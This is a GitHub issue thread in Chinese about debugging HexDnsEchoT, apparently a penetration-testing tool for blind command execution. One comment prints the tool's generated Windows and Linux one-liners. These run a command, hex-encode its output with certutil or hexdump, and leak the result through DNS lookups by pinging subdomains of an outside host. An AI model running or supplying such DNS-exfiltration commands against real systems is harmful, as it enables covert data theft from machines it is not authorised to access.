### ISSUE TITLE
老哥报错了

### ISSUE THREAD

**Issue by Janit8r** [A0WaQ4/HexDnsEchoT#1]
----Command: ifconfig----
Wait Command DNSLog Record Finish...
 Wait DNSLog data: 0s...!!!!Error Command format! Try to find DNSLog site(dnslog) to get conntent..
Traceback (most recent call last):
  File "C:\Users\Admin\Downloads\HexDnsEchoT-main\HexDnsEchoT.py", line 230, in <module>
    deal_data(dataList)
  File "C:\Users\Admin\Downloads\HexDnsEchoT-main\HexDnsEchoT.py", line 115, in deal_data
    hexCommand[-1] = ''.join(hexCommand[-1].split('0d0a')[:-1])
                             ~~~~~~~~~~^^^^
KeyError: -1

**Comment by A0WaQ4** [comment]
师傅麻烦提供一下ceye dns接收页面截图，执行命令生成的ifconfig7、ifconfig7.txt的文件截图

**Comment by A0WaQ4** [comment]
师傅你好，很有可能是ifconfig的命令结果过大，导致超过了100条，而ceye仅能显示100条数据，之后将会添加另一个dns服务器来解决该问题

**Comment by Janit8r** [comment]
老哥，不知道你要的是那一部分我把ceye上的都截图了放在文档里，其余两个文件也放在仓库里了https://github.com/Janit8r/save__q28

**Comment by A0WaQ4** [comment]
师傅你好，因为ceye会出现重复的dns结果，同时只能保存100条数据，所以获取比较大的命令结果效果会不太好，现在更新了自定义DNS服务器，师傅可以尝试使用一下。
下载最新的`HexDsnEchoT.py`，执行：
`python3 HexDnsEchoT.py -ds http://dig.pm -tz "UTC" -cc 7`

**Comment by Janit8r** [comment]
老哥，结果还是一样，你执行脚本的是什么环境？我windows11和kali 都不行

python3 HexDnsEchoT.py -ds http://dig.pm -tz "UTC" -cc 7
请输入想要执行的命令:whoami

获取本次命令执行结果:
python3 HexDnsEchoT.py -ds http://dig.pm -t 5l69vl4nia6i -lt "2023-03-20 08:07:55" -m GR -cc 7

http://dig.pm/5l69vl4nia6i
2023-03-20 08:07:55
Windows:

del whoami7 && del whoami7.txt && whoami > whoami7 &&echo 11111111111>>whoami7 && certutil -encodehex whoami7 whoami7.txt && for /f "tokens=1-17" %a in (whoami7.txt) do start /b ping -nc 1  %a%b%c%d%e%f%g%h%i%j%k%l%m%n%o%p%q.whoami.afafcfdc.ipv6.1433.eu.org.

Linux:

rm -f whoami7;rm -f whoami7.txt;whoami > whoami7 &&echo 11111111111 >>whoami7 && cat whoami7|hexdump -C > whoami7.txt && cat whoami7.txt |sed "s/[[:space:]]//g" | cut -d "|" -f1 | cut -c 5-55| while read line;do ping -c 1 -l 1 $line.whoami.afafcfdc.ipv6.1433.eu.org.; done
 Wait DNSLog data: 0s... data: 2s...
Find Command Record!...
----Command: whoami----
Wait Command DNSLog Record Finish...
 Wait DNSLog data: 0s...!!!!Error Command format! Try to find DNSLog site(dnslog) to get conntent..
Traceback (most recent call last):
  File "/home/kali/Desktop/HexDnsEchoT-main/HexDnsEchoT.py", line 367, in <module>
    deal_ds_data(dataList)
  File "/home/kali/Desktop/HexDnsEchoT-main/HexDnsEchoT.py", line 185, in deal_ds_data
    hexCommand[-1] = ''.join(hexCommand[-1].split('0d0a')[:-1])
KeyError: -1

**Comment by A0WaQ4** [comment]
我的环境是Macos和Win10
师傅你的`_.whoami.afafcfdc.ipv6.1433.eu.org.`是从何而来的啊
<img width="501" alt="image" src="https://user-images.githubusercontent.com/117633012/226283313-54de6d23-df03-4817-a533-51cc05e7ffb1.png">

**Comment by Janit8r** [comment]
自动获取的，我就输了whoami和python3 HexDnsEchoT.py -ds http://dig.pm -tz "UTC" -cc 7

**Comment by A0WaQ4** [comment]
师傅加我微信吧 A0WaQ4
